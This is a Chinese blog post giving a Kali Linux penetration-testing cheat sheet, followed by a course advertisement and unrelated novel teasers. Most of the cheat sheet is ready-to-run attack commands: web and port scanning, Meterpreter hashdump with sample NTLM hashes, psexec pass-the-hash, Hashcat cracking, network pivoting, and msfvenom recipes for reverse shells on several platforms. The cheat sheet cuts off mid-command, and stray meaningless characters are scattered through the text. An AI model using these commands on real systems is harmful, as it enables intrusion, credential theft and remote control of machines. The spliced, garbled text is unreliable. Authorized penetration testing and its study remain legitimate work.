kali 下滲透測試的一些小技巧

總結(jié)在滲透測試上的一些小技巧,基本上都是 kali 下的一些常用的工具使用集合

DIRB
使用 DIRB 爆破目錄
注: DIRB 是一個專門用于爆破目錄的工具蹄殃,在 Kali 中默認已經(jīng)安裝,類似工具還有國外的 patator , dirsearch 择葡, DirBuster 挨务, 國內(nèi)的御劍等等击你。

dirb http://[IP]:PORT /usr/share/dirb/wordlists/common.txt
Niko
使用 Nikto 掃描 Web 服務
nikto -C all -h http://[IP]
wpscan
使用 wpscan 掃描 WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http:http://[IP]/ –enumerate p
httprint
使用 httprint 進行 HTTP 指紋識別
wget //www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://[IP] -s signatures.txt
Skipfish
使用 Skipfish 進行 Web 應用安全
注:Skipfish 是一款 Web 應用安全偵查工具,Skipfish 會利用遞歸爬蟲和基于字典的探針生成一幅交互式網(wǎng)站地圖谎柄,最終生成的地圖會在通過安全檢查后輸出丁侄。

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://[IP]
nc
使用 nc 進行掃描
nc -v -w 1 target -z 1-1000
for i in {101…102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
us
使用 Unicornscan 進行信息收集和安全審計
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535

-H 在生成報告階段解析主機名

-m 掃描類型 (sf - tcp, U - udp)

-Iv - 詳細

Xprobe2
使用 Xprobe2 識別操作系統(tǒng)指紋
xprobe2 -v -p tcp:80:open IP
Meterpreter
使用 Meterpreter 進行端口轉(zhuǎn)發(fā)

//www.offensive-security.com/metasploit-unleashed/portfwd/

轉(zhuǎn)發(fā)遠程端口到目標地址

meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
使用 Meterpreter 獲取哈希值
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash http://[IP] cmd

或者

apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

再或者

meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell
使用 Hashcat 破解密碼
hashcat -m 400 -a 0 hash /root/rockyou.txt
使用 metasploit 進行穿透
route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

或者

//www.offensive-security.com/metasploit-unleashed/pivoting/

meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > Ctrl+Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter > ipconfig
IP Address : 10.1.13.2
ssh
SSH 穿透
ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target
SSH 穿透從一個網(wǎng)絡到另一個網(wǎng)絡
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target
msfvenom
MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b “\x00” -a x86 --platform win -f c
MSF 生成在 Linux 下反彈的 Meterpreter Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反彈 Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b “\x00\x0a\x0d” -a x86 --platform win -f c
MSF 生成反彈 Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反彈 ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp
MSF 生成反彈 Bash Shell
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh
MSF 生成反彈 PHP Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php
add <?php at the beginning
perl -i~ -0777pe’s/^/<?php \n/’ shell.php
MSF 生成反彈 Win Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=<Your Port to Co

kali 下滲透測試的一些小技巧

小編專門整理了一套有關(guān)網(wǎng)絡安全2021從入門到精通學習視頻教程

包含了網(wǎng)絡安全學習路線全階段視頻教程(從入門到精通),涵蓋了你所需要掌握的所有前沿技術(shù)及知識點朝巫!

資料針對人群

  • 在校大學生
  • 零基礎(chǔ)小白
  • 想學習安全課程的朋友
  • 想轉(zhuǎn)行的朋友
  • 有運維基礎(chǔ)想提升的朋友
  • 想學習運維的朋友
  • 想進階學習網(wǎng)絡安全

在學習網(wǎng)絡安全的路上鸿摇,難免深受這些難題的困擾:

  • 如何才能成功進攻網(wǎng)絡安全行業(yè)呢?
  • 零基礎(chǔ)怎樣學習才能更快入門劈猿、學起來更有效率拙吉?
  • 怎么確保自己學到的是市場需求的潮孽?

額外福利:安全學習路線一份和價值499的體驗課程免費學習權(quán)限

kali 下滲透測試的一些小技巧
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市筷黔,隨后出現(xiàn)的幾起案子往史,更是在濱河造成了極大的恐慌,老刑警劉巖佛舱,帶你破解...
    沈念sama閱讀 206,968評論 6 482
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件椎例,死亡現(xiàn)場離奇詭異,居然都是意外死亡请祖,警方通過查閱死者的電腦和手機订歪,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,601評論 2 382
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來肆捕,“玉大人刷晋,你說我怎么就攤上這事「Q梗” “怎么了掏秩?”我有些...
    開封第一講書人閱讀 153,220評論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長荆姆。 經(jīng)常有香客問我蒙幻,道長,這世上最難降的妖魔是什么胆筒? 我笑而不...
    開封第一講書人閱讀 55,416評論 1 279
  • 正文 為了忘掉前任邮破,我火速辦了婚禮,結(jié)果婚禮上仆救,老公的妹妹穿的比我還像新娘抒和。我一直安慰自己,他們只是感情好彤蔽,可當我...
    茶點故事閱讀 64,425評論 5 374
  • 文/花漫 我一把揭開白布摧莽。 她就那樣靜靜地躺著,像睡著了一般顿痪。 火紅的嫁衣襯著肌膚如雪镊辕。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,144評論 1 285
  • 那天蚁袭,我揣著相機與錄音征懈,去河邊找鬼。 笑死揩悄,一個胖子當著我的面吹牛卖哎,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 38,432評論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼亏娜,長吁一口氣:“原來是場噩夢啊……” “哼焕窝!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起照藻,我...
    開封第一講書人閱讀 37,088評論 0 261
  • 序言:老撾萬榮一對情侶失蹤袜啃,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后幸缕,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體群发,經(jīng)...
    沈念sama閱讀 43,586評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,028評論 2 325
  • 正文 我和宋清朗相戀三年发乔,在試婚紗的時候發(fā)現(xiàn)自己被綠了熟妓。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,137評論 1 334
  • 序言:一個原本活蹦亂跳的男人離奇死亡栏尚,死狀恐怖起愈,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情译仗,我是刑警寧澤抬虽,帶...
    沈念sama閱讀 33,783評論 4 324
  • 正文 年R本政府宣布,位于F島的核電站纵菌,受9級特大地震影響阐污,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜咱圆,卻給世界環(huán)境...
    茶點故事閱讀 39,343評論 3 307
  • 文/蒙蒙 一笛辟、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧序苏,春花似錦手幢、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,333評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至匈睁,卻和暖如春管钳,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背软舌。 一陣腳步聲響...
    開封第一講書人閱讀 31,559評論 1 262
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留牛曹,地道東北人佛点。 一個月前我還...
    沈念sama閱讀 45,595評論 2 355
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親超营。 傳聞我的和親對象是個殘疾皇子鸳玩,可洞房花燭夜當晚...
    茶點故事閱讀 42,901評論 2 345

推薦閱讀更多精彩內(nèi)容